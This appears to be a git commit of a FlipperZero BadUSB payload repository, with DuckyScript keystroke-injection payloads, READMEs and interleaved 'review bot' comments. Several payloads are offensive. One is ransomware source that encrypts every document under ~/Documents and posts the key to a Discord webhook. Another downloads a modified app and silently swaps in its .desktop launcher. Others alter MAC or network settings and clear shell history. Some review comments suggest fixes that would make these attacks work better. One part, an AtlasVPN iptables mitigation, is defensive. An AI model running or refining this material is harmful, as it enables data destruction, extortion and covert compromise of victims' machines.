This commit is contained in:
Aleff
2025-07-04 07:09:11 +00:00
commit 9bcd0cf43d
317 changed files with 31531 additions and 0 deletions
@@ -0,0 +1 @@
github: [aleff-github]
@@ -0,0 +1,51 @@
# Sample workflow for building and deploying a Jekyll site to GitHub Pages
name: Free and open source payloads for FlipperZero
on:
# Runs on pushes targeting the default branch
push:
branches: ["main"]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages
permissions:
contents: read
pages: write
id-token: write
# Allow only one concurrent deployment, skipping runs queued between the run in-progress and latest queued.
# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete.
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
# Build job
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Setup Pages
uses: actions/configure-pages@v3
- name: Build with Jekyll
uses: actions/jekyll-build-pages@v1
with:
source: ./
destination: ./_site
- name: Upload artifact
uses: actions/upload-pages-artifact@v1
# Deployment job
deploy:
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v2
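Review bot: every `uses:` in this workflow is pinned to a mutable major tag (`actions/checkout@v3`, `actions/deploy-pages@v2` and the rest) while the deploy job holds `id-token: write`, so whoever can move one of those tags can publish to this repository's Pages site; pin each action to a full commit SHA and keep the tag in a trailing comment. The leading `# Sample workflow for building and deploying a Jekyll site to GitHub Pages` is the template's own comment and no longer matches `name: Free and open source payloads for FlipperZero`; drop it or say what this workflow actually publishes.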
@@ -0,0 +1,87 @@
# Change Remote Git Link
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
This script turns out to be very useful for aviting data leaks between old cloned repositories and new online repositories.
To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
## Payload.txt config - Windows 10/11 - Tested on Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
```
## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
```
## Dependencies
* Internet Connection
* git installed
* Full path of the cloned repository
* ExecutionPolicy Bypass
## Settings
- Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
```DuckyScript
DEFINE #FULL-PATH example
```
- Link from which updates are to be downloaded so the new repository the Repository2
```DuckyScript
DEFINE #NEW-GIT-LINK example.git
```
- REM Define the branch of the new repository Repository2, i.e. "main"
```DuckyScript
DEFINE #BRANCH example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
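Review bot: the Dependencies list names `ExecutionPolicy Bypass`, but nothing in this README's Windows prologue or the git commands it describes runs a PowerShell script; execution policy governs `.ps1` files, not commands typed at the prompt, so either drop the item or say which script needs it. Smaller points in the same hunk: "aviting" in the Description should be "avoiding"; the sentence "This script can be used to change the remote link ..." appears verbatim both under the title and under Description; the bullet `- REM Define the branch of the new repository Repository2` carries a stray `REM` copied from the payload; and the Description asks the "Hak5 community" to contribute the macOS block although this repository targets the FlipperZero.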
@@ -0,0 +1,42 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
REM - git installed
REM - Full path of the cloned repository
REM - ExecutionPolicy Bypass if runned on Windows
REM Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
DEFINE #FULL-PATH example
REM Link from which updates are to be downloaded so the new repository the Repository2
DEFINE #NEW-GIT-LINK example.git
REM Define the branch of the new repository Repository2, i.e. "main"
DEFINE #BRANCH example
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN cd #FULL-PATH
DELAY 1000
STRINGLN git remote set-url origin #NEW-GIT-LINK
DELAY 1000
STRINGLN git pull --force origin #BRANCH
DELAY 1000
STRINGLN git reset --hard origin/#BRANCH
DELAY 1000
ALT F4
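Review bot: `STRINGLN git pull --force origin #BRANCH` is the step most likely to stall and is not needed: when the local history diverges from the new remote, recent git releases refuse the pull unless `pull.rebase`/`pull.ff` is configured, and older ones open an editor for the merge commit, neither of which the fixed `DELAY 1000` waits for. The following `git reset --hard origin/#BRANCH` already discards local state, so `git fetch origin #BRANCH` followed by the reset does the same thing deterministically. Quote the path in `STRINGLN cd #FULL-PATH` as well, since any directory with spaces breaks `cd`, and note that the header says `Target : Windows 10-11/Linux` while the body only types the Windows `GUI r` / `powershell` prologue.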
@@ -0,0 +1,58 @@
# Change MAC Address - BadUSB ✅
A script used to change the MAC address on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change the MAC address on a Linux machine.
Opens a shell, get the network card name, set the new MAC address, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the new MAC address
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
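Review bot: "erase traces" in the Description oversells what the payload does: `history -c` only empties the in-memory history of the root shell, while the `sudo su` that opened it is still recorded by the calling user's shell and by sudo's own logging (auth log or journal), and the `apt install net-tools` step leaves an entry in apt's history log. State what is and is not cleaned, and note that the `Internet Connection` dependency exists only because of that apt step.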
@@ -0,0 +1,73 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### MAC SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set here your preferred MAC, you can don't change it remaining with the default value
DEFINE NEW_MAC 42:02:07:8f:a7:38
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE down
ENTER
DELAY 500
STRING ifconfig $INTERFACE hw ether
STRING NEW_MAC
ENTER
DELAY 500
STRING ifconfig $INTERFACE up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
REM Close shell
STRING exit
ENTER
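Review bot: `STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')` picks field 5 positionally, which is the interface only when the route has a `via` hop; on a point-to-point or VPN interface the output is `8.8.8.8 dev <if> src <ip> ...` and field 5 is the source address, so the later `ifconfig $INTERFACE ...` lines act on an IP string. Take the token after `dev` instead (for example `awk '{for(i=1;i<NF;i++) if($i=="dev") print $(i+1)}'`). The `apt install net-tools` step can then go too: `ip link set dev "$INTERFACE" address <mac>` with the iproute2 tool already in use replaces the three `ifconfig` lines, with no package install, no network dependency and no guessed `DELAY 2000`. Splitting `STRING ifconfig $INTERFACE hw ether` and `STRING NEW_MAC` across two lines also depends on a trailing space surviving on the first line; one STRING line is safer.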
@@ -0,0 +1,58 @@
# Change Network Configuration - BadUSB ✅
A script used to change the network configuration on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change the network configuration on a Linux machine.
Opens a shell, get the network card name, set the network configuration, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
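Review bot: "Change as you want the network configuration" under Settings should say which values are actually applied (address and netmask) and that this is a one-shot `ifconfig` change, which NetworkManager or the DHCP client on a desktop install will typically overwrite on the next lease renewal or reconnect. `Internet Connection` is listed as a dependency only because the payload apt-installs net-tools, and "erase traces" in the Description refers to `history -c` alone, which does not touch sudo or apt logs.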
@@ -0,0 +1,81 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### IP SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set network interface
DEFINE IP 192.168.1.100
DEFINE MASK 255.255.255.0
DEFINE GATEWAY 192.168.1.1
STRING IP="
STRING IP
STRING "
ENTER
DELAY 500
STRING MASK="
STRING MASK
STRING "
ENTER
DELAY 500
STRING GATEWAY="
STRING GATEWAY
STRING "
ENTER
DELAY 500
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE $IP netmask $MASK up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
REM Close shell
STRING exit
ENTER
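Review bot: `GATEWAY` is defined and written into the shell (`STRING GATEWAY="` ... `STRING "`) but never used; the only configuration line is `STRING ifconfig $INTERFACE $IP netmask $MASK up`, so the host ends up with a new address and no matching default route. Add `ip route replace default via "$GATEWAY" dev "$INTERFACE"` after it, or drop the variable together with the misleading `REM Set network interface` comment above it. The `ip route get 8.8.8.8 | awk '{print $5}'` detection also assumes a route with a `via` hop; on a point-to-point or VPN interface field 5 is not the interface name. Finally, nothing here tells NetworkManager to leave the interface alone, so on a desktop the static address is likely to be reverted.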
Binary file not shown.
@@ -0,0 +1,112 @@
# Defend yourself against AtlasVPN *Bug-Door*
This script has been developed to allow you to mitigate a well-known vulnerability in the AtlasVPN client based on its APIs, which, as of today, has not been resolved. The term "bugdoor" has been coined to describe this situation, as the bug has been reported multiple times without being addressed, effectively creating an open backdoor (bug + backdoor).
**Category**: Incident Response
![](1.png)
## Table of contents:
- Payload description
- AtlasVPN vulnerability
- - Summary
- - Dependencies
- Settings
- - Administrative Privileges
- - Set the rule
- - See the rule
- - Remove the rule
- Credits
## Payload description
This payload arises from the need to address a 0day vulnerability, which is now reasonable to assume has been known for mounths (maybe years), within the Linux client of AtlasVPN version 1.0.3. This vulnerability leads to a leakage of the user's real IP address, a situation that typically requires a prompt response from the company to provide a resolution patch and mitigate potential attacks.
However, in this case, the user who discovered the vulnerability had already proactively informed and reported it to the company in question. Surprisingly, up to this point, the company has not only failed to release any patches but has also not made any statements regarding the issue. This raises serious doubts about the nature of the problem, prompting questions (as highlighted by the vulnerability reporter) about the possibility that it might be an intentional bug or a deliberate backdoor, given that it is such a trivial error that it is absurd it hasn't been addressed proactively.
It's important to emphasize that these considerations represent personal opinions based on the original 0day report's message and should encourage discussions about cybersecurity and the reliability of the VPN service offered. If the company decides to provide a patch, it should also be required to explain the reason behind this prolonged negligence.
## AtlasVPN vulnerability
From [AtlasVPN Linux Client 1.0.3 Remote Disconnect Exploit](https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/)
> The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.
### Summary
> The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.
The exploit code will not be included in this payload, as the primary goal here is defensive, not offensive. It's important to note that it's relatively easy to find a fully functional Proof of Concept (POC) for this vulnerability online if you need it for vulnerability testing purposes.
### Dependencies
Source [1]: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
Source [2] (Italian article): https://www.redhotcyber.com/post/ce-poco-da-nascondersi-il-bug-sul-client-di-atlas-vpn-rende-tutti-visibili/
## Settings
In order to mitigate this critical vulnerability, it is imperative to understand its operation at a more detailed level. Specifically, in the case of the AtlasVPN client, it is relevant to note that it opens an API service on localhost at port 8076 without any form of authentication. This lack of authentication allows, based on this specific detail, full access not only to any programs running on the computer but also (and this is the most concerning aspect) to any website making appropriate requests. This is an extremely serious vulnerability that exposes the user significantly. Therefore, waiting for a patch is not acceptable, and it is essential to take prompt action, even independently, perhaps using this payload.
This "home-made" solution involves partially closing port 8076, specifically by disabling the ability to establish new incoming connections through the same port. It is important to note that there are various attack strategies that could potentially bypass this protection, but at least a basic level of security is applied, which is not present by default. It is crucial to understand that this solution does not completely resolve the vulnerability but rather reduces the risk of being targeted by attacks based on it.
### Administrative Privileges
To apply this homemade patch, you will need to set up a Firewall rule, and therefore, you must have knowledge of the password to acquire administrator or root permissions.
### Set the rule
The Firewall rule that will be set will aim to block all connections that try to create a new connection on port 8076.
`sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
**sudo**: The command is run with administrator or root privileges to allow configuration of firewall rules.
**iptables**: This is the command for configuring the firewall iptables.
**-A INPUT**: This indicates that the rule will be added to the input chain, which handles incoming traffic.
**-p tcp**: This specifies that the rule applies only to TCP traffic.
**--dport 8076**: Specifies that the rule applies to traffic destined for port 8076.
**-m state --state NEW**: Uses the "state" form to specify that the rule applies only to new incoming connections ("NEW" state).
**-j DROP**: Indicates that the action to be taken for matches to this rule is "DROP," i.e., rejecting or blocking the connection.
### See the rule
If you want to see the rule you can use the command `iptables -S` with `grep "8076"`.
`sudo iptables -S | grep "8076"`
### Remove the rule
One of the ways to delete iptables rules is by rule specification. To do so, you can run the iptables command with the -D option followed by the rule specification.
`sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
![](1.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
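Review bot: the rule under Set the rule is appended (`-A INPUT`); on Ubuntu with ufw enabled the INPUT chain already jumps to ufw's chains, which accept all loopback traffic before any appended rule is reached, so the DROP never sees the localhost connections this vulnerability relies on. Insert it first (`sudo iptables -I INPUT 1 -p tcp --dport 8076 -m conntrack --ctstate NEW -j DROP`) and say so; `-m state --state NEW` still works but is the legacy form of `-m conntrack --ctstate NEW`. The README should also state two consequences plainly: dropping every NEW connection to 8076 on loopback also blocks the legitimate `atlasvpn` client from reaching `atlasvpnd` over that same API, which is the trade-off this "home-made" patch makes, and iptables rules are not persistent across reboot unless saved (netfilter-persistent or equivalent). Wording: "mounths" should be "months", and the subsection headed `### Dependencies` lists sources, not dependencies.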
@@ -0,0 +1,32 @@
REM ############################################################
REM # #
REM # Title : Defend yourself against AtlasVPN Bug-Door #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Administrator Permission
REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Add the rule and close the shell
STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; exit;
REM Add the rule and display it
REM STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; sudo iptables -S | grep "8076";
REM Remove the rule
REM STRINGLN sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP
DELAY 500
STRINGLN #SUDO-PWS
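Review bot: the active line ends with `; exit;`, so the terminal closes before anyone can see whether sudo accepted `#SUDO-PWS` or whether the rule went in, while the variant that follows with `sudo iptables -S | grep "8076"` is the one commented out; make the verifying variant the default. Ordering matters too: the command is typed first and the password only after `DELAY 500`, and if sudo does not prompt (cached credentials) the shell exits immediately and the clear-text password is typed into whatever window has focus next. Add a REM that the rule lives only in the running kernel tables and must be re-applied or saved to survive a reboot, and reconcile `Category : Execution` in the header with the README, which files this payload under Incident Response.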
@@ -0,0 +1,66 @@
# Edit The Default Real App With An Arbitrary
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
The script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive.
## Getting Started
### Dependencies
* sudo permissions
* Internet Connection
* Original application installed
### Settings
- Set the link from which to download the zipper archive
```DuckyScript
DEFINE ARBITRARY_APP_LINK example
```
- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
```DuckyScript
DEFINE PATH_TO_DESKTOP_FILE example/path
```
- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
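Review bot: the `sudo permissions` dependency is avoidable. Under the Desktop Entry specification a file with the same name in `~/.local/share/applications/` takes precedence over `/usr/share/applications/<name>.desktop` for that user, so the override can be installed without root and without touching the packaged file; the README should at least mention that alternative. The Settings example is also circular: "if ... the desktop file path is Signal/files/signal you should put the path Signal/files/signal" repeats the same string, so show the path inside the zip against the DEFINE value. Spelling: "insted off" (instead of), "wich" (which), "rich this information" (retrieve this information).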
@@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;
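Review bot: `Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U` will not launch: the Desktop Entry specification does no tilde expansion in `Exec`, and once the file is copied into `/usr/share/applications/` there is no single home directory it could refer to anyway. Use an absolute path, and since the payload unzips into the directory the terminal happens to open in (`unzip ./arbitrary.zip -d ./.arbitrary`), make that location explicit as well.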
@@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=/opt/Signal/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;
@@ -0,0 +1,63 @@
REM ################################################################
REM # |
REM # Title : Edit The Default Real App With An Arbitrary |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM ################################################################
REM Requirements:
REM - sudo permissions
REM - Internet connection
REM - Executable app
REM - '.desktop' file
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
REM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
DEFINE PATH_TO_DESKTOP_FILE example/path
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING curl -o ./arbitrary.zip "
STRING ARBITRARY_APP_LINK
STRINGLN "
REM Depends*
DELAY 5000
STRINGLN unzip ./arbitrary.zip -d ./.arbitrary
REM Depends*
DELAY 2000
STRINGLN rm ./arbitrary.zip
DELAY 1000
STRING sudo mv ./.arbitrary/
STRING PATH_TO_DESKTOP_FILE
STRING /usr/share/applications/
STRING ORIGINAL_DESKTOP_FILE_NAME
ENTER
DELAY 1000
STRING SUDO
ENTER
DELAY 4000
ALT f4
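Review bot: `STRING curl -o ./arbitrary.zip "` has neither `-L` nor `-f`, so a redirecting link (GitHub release assets, for example) or an HTTP error stores the redirect or error body as the zip, the fixed `DELAY 5000` then hands a partial or bogus file to `unzip`, and `rm ./arbitrary.zip` removes the only evidence of what went wrong. Chain the steps with `&&` in a single STRINGLN (`curl -fL -o ... && unzip ... && rm ...`) so the sequence stops at the first failure instead of relying on the "Depends*" timers. Two smaller points: `DEFINE SUDO example` stores the sudo password in the payload in clear text, which the header should warn about, and `ALT f4` should match the `ALT F4` spelling used in the other payloads.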
@@ -0,0 +1,42 @@
from cryptography.fernet import Fernet
import os
import requests
import subprocess
import json
"""Cipher function"""
def cyp_folder(path, fernet):
for root, files in os.walk(path):
for filename in files:
filepath = os.path.join(root, filename)
if not os.access(filepath, os.R_OK):
continue
if "directory" in str(os.system(f"file {filepath}")):
cyp_folder(path=filepath, fernet=fernet)
with open(filepath, "rb") as f:
data = f.read()
encrypted_data = fernet.encrypt(data)
with open(filepath, "wb") as f:
f.write(encrypted_data)
"""Send the key used for encryption"""
def send_key(username, key, discord_webhook_url):
message = {
"username": f"{username}",
"content": f"Key:{key}"
}
message_json = json.dumps(message)
requests.post(discord_webhook_url, data=message_json, headers={'Content-Type': 'application/json'})
"""Just some variables"""
KEY = Fernet.generate_key()
FERNET = Fernet(KEY)
USERNAME = subprocess.check_output(['whoami']).decode('ascii')
INITIAL_PATH = f"/home/{USERNAME}/Documents/"
WEBHOOK_URL = ''
cyp_folder(path=INITIAL_PATH, fernet=FERNET)
send_key(username=USERNAME, key=KEY, discord_webhook_url=WEBHOOK_URL)
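Review bot: `os.system(f"file {filepath}")` returns the exit status, not the command output, so `"directory" in str(...)` is never true and the recursive `cyp_folder` call is dead code (`os.walk` already descends into subdirectories); the unquoted `{filepath}` in that shell command is also a command injection through file names. `send_key` posts the repr of a bytes object (`Key:b'...'`) rather than the key text. Beyond correctness, this script overwrites every readable file under `Documents` in place with no backup, and the only copy of the key leaves the machine to a third-party webhook; that irreversibility belongs in the script's own header, not only in the repository disclaimer image.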
@@ -0,0 +1,56 @@
# Encrypt All Documents - BadUSB ✅
A script used to encrypt all documents.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to encrypt all documents.
Opens a shell, dowloand the Python script and use the Fernet cipher for encrypt all files.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
- Set your Discord Webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
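Review bot: the Description ("Opens a shell, dowloand the Python script and use the Fernet cipher for encrypt all files") omits the two facts a reader needs before plugging this in: the files are overwritten in place and cannot be recovered without the generated key, and that key is sent to the Discord webhook set under Settings, i.e. to whoever controls that webhook. State both, fix "dowloand" and "for encrypt", and say that the Python script is fetched from the internet at run time rather than shipped with the payload.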
@@ -0,0 +1,44 @@
REM ########################################
REM # |
REM # Title : Encrypt All Documents |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ########################################
REM ATTENTION - BEFORE USING THIS PAYLOAD MAKE SURE YOU UNDERSTAND WHAT IT DOES
REM
REM Script description
REM
REM The Python code defines a function "cyp_folder" that encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm. The function takes two arguments: the path of the folder to be encrypted ("path") and a Fernet object ("fernet") that contains the encryption key.
REM
REM Inside the function, the os.walk function is used to obtain a list of all files in the specified folder and its subfolders. For each file found, its full path is created and checked for readability using the os.access function. If the file is not readable, the loop moves on to the next file.
REM
REM The "file" Linux command is then executed to determine if the file is a text file or a directory. If the file is a directory, the "cyp_folder" function is recursively called on the directory.
REM
REM If the file is a text file (or however not a directory), it is opened in binary read mode using the "open" function. The contents of the file are read and then encrypted using the "encrypt" function of the Fernet object.
REM
REM Finally, the file is opened in binary write mode and the encrypted content is written to the file, overwriting the original content.
REM
